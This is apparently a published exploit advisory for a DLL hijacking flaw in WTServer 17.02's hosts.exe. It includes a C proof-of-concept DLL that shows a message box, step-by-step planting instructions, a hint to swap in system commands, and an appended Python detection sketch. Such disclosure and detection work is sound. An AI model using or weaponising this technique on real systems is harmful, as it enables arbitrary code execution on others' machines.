
WTServer 17.02 DLL Hijacking

Posted Mar 10, 2017
Authored by Nassim Asrir

WTServer version 17.02 suffers from a DLL hijacking vulnerability.

tags | exploit
systems | windows
SHA-256 | 42f354f701a039d4b1f5f143f56c2b0fa06cd43c86ae75c3e5c03fa139903414

[+] Title: WTServer-17.02 - DLL Loading Arbitrary Code Execution
[+] Credits / Discovery: Nassim Asrir
[+] Author Email: wassline@gmail.com
[+] Author Company: Henceforth

Vendor:
===============

http://wtserver.wtriple.com/


Download:
===========

https://sourceforge.net/projects/wtnmp/files/latest/download?source=directory

About Product:
===============

WTServer - Nginx MariaDB Redis Php development stack for Windows

A lightweight, fast and stable server stack for developing php mysql applications on windows, based on the excellent webserver Nginx. A lighter alternative to XAMPP and WAMP.


Package contains:
- Nginx 1.11.10 web server
- MariaDB 10.1.21 database server, mysql replacement (32/64bit)
- Redis 3.2 Cache/NoSql, memcached alternative (64bit)
- Php 5.6.30 & PHP 7.0.16 & PHP 7.1.2 scripting language (32/64bit)
- WinSCP SFTP client
- HTTPS using free LetsEncrypt certificates
- Composer dependency manager for php
- Adminer web based database manager
- Reg.php regular expressions tester
- WTServer Manager (32/64bit), formerly known as *wt-nmp*

Vulnerability Type:
===================

DLL Loading Arbitrary Code Execution.


Information:
===================

The vulnerable program in WTServer is "hosts.exe", and the vulnerable DLL is "api-ms-win-appmodel-runtime-l1-1-0.dll".


POC:
===================
Download the POC from GitHub and compile it with "CodeBlocks" or "GCC".

https://gist.github.com/Nassim-Asrir/8f9a97919e84c4cddc491b317672172b

Data:

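// Compile this code and rename the output to "api-ms-win-appmodel-runtime-l1-1-0.dll", then copy it to "C:\WTServer\bin\HostsEditor" and launch "hosts.exe".
// For any information, contact me at: wassline@gmail.com

#include "main.h"

#include <windows.h>
#define DllExport __declspec (dllexport)

// Shows a message box as visible proof that code inside the DLL ran.
int mes()
{
    MessageBox(0, "DLL Hijacking Vulnerable", "Nassim Asrir", MB_OK);
    return 0;
}

// Entry point the Windows loader calls when the DLL is mapped into a process.
BOOL WINAPI DllMain (
    HANDLE hinstDLL,
    DWORD fdwReason,
    LPVOID lpvReserved)
{
    mes();
    return TRUE; // DllMain must return a value; TRUE reports successful initialisation
}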


- Download the POC, compile it, and copy it to "C:\WTServer\bin\HostsEditor", then launch "hosts.exe" and you will see the MessageBox. You can also modify the code to launch a system command (calc or ....).
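
A detection sketch for the load described above, added here as an example and not part of the original advisory: it flags image-load events in which a DLL with an API-set style name (api-ms-* / ext-ms-*) is loaded from outside the Windows system directories without a valid Microsoft signature. The event dictionaries are constructed samples that use Sysmon Event ID 7 field names; the function names, the system directory list and the signer check are assumptions.

```python
import ntpath
import re

# Names in the API-set namespace, such as the DLL named in this advisory.
API_SET_NAME = re.compile(r"^(api|ext)-ms-[a-z0-9-]+\.dll$", re.IGNORECASE)
# Assumption: default Windows install on C:.
SYSTEM_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64", r"c:\windows\winsxs")


def in_system_dir(path):
    """True if path lies inside one of SYSTEM_DIRS (case-insensitive)."""
    folder = ntpath.normpath(ntpath.dirname(path)).lower()
    return any(folder == d or folder.startswith(d + "\\") for d in SYSTEM_DIRS)


def is_suspicious_load(event):
    """Flag an image-load event that fits the planted-DLL pattern."""
    loaded = event["ImageLoaded"]
    if not API_SET_NAME.match(ntpath.basename(loaded)):
        return False
    if in_system_dir(loaded):
        return False
    # App-local copies of Microsoft-signed runtime DLLs are legitimate.
    ms_signed = (event.get("Signed") == "true" and event.get("SignatureStatus") == "Valid"
                 and event.get("Signature", "").startswith("Microsoft"))
    return not ms_signed


def triage(events):
    """Return (process, dll) pairs for every suspicious load."""
    return [(e["Image"], e["ImageLoaded"]) for e in events if is_suspicious_load(e)]


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"Image": r"C:\WTServer\bin\HostsEditor\hosts.exe",
     "ImageLoaded": r"C:\WTServer\bin\HostsEditor\api-ms-win-appmodel-runtime-l1-1-0.dll",
     "Signed": "false", "Signature": "-", "SignatureStatus": "Unavailable"},
    {"Image": r"C:\WTServer\bin\HostsEditor\hosts.exe",
     "ImageLoaded": r"C:\Windows\System32\kernel32.dll",
     "Signed": "true", "Signature": "Microsoft Windows", "SignatureStatus": "Valid"},
    {"Image": r"C:\Tools\app.exe",
     "ImageLoaded": r"C:\Tools\api-ms-win-crt-runtime-l1-1-0.dll",
     "Signed": "true", "Signature": "Microsoft Windows", "SignatureStatus": "Valid"},
]

if __name__ == "__main__":
    for proc, dll in triage(SAMPLE_EVENTS):
        print(f"ALERT {proc} loaded {dll}")
```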


CVE Reference:
===============

N/A


Tested on:
===============

Windows 7

Windows XP



